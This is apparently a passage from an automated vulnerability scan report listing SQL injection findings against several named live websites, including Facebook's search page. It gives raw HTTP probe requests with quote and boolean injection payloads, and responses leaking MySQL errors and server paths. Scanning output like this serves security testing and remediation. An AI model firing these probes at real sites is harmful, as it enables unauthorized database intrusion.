The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads/privacy.htm' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:29 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 226

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''cmsAdmin/uploads/privacy.htm'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads/privacy.htm'' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:30 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.19. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/privacy.htm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads/privacy.htm?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:01 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads/privacy.htm?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:01 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.20. http://www.baysideeyes.com.au/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:34:35 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=utf-8
Content-Length: 209

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /favicon.ico'' HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:34:35 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.21. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:34:23 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:34:23 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.22. http://www.baysideeyes.com.au/referrer-information.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /referrer-information.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /referrer-information.htm' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:55 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 222

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''referrer-information.htm'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /referrer-information.htm'' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:56 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.23. http://www.baysideeyes.com.au/referrer-information.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /referrer-information.htm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /referrer-information.htm?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:38 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /referrer-information.htm?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:39 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.24. http://www.baysideeyes.com.au/sitemap.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /sitemap.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /sitemap.htm' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:37 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''sitemap.htm'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /sitemap.htm'' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:38 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.25. http://www.baysideeyes.com.au/sitemap.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /sitemap.htm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /sitemap.htm?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:25 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /sitemap.htm?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:27 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.26. http://www.facebook.com/search/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /search/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=UUBNY; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 22:39:35 GMT
Content-Length: 15579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yL/r/u8Bue217GRs.css" />
<link type="text/css" rel="stylesheet" href="http://d.static.ak.fbcdn.net/rsrc.php/y3/r/qFXzV0xbJP2.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"><div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" name="lsd" value="UUBNY" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="en_US" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td cl
...[SNIP]...

Request 2

GET /search/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Qj720; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 22:39:36 GMT
Content-Length: 15411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yL/r/u8Bue217GRs.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"><div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" name="lsd" value="Qj720" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="en_US" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="
...[SNIP]...

1.27. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /terms/team-calendar/calendar.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /terms'/team-calendar/calendar.html HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 376
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br />
<br />
<b>Wa
...[SNIP]...

Request 2

GET /terms''/team-calendar/calendar.html HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
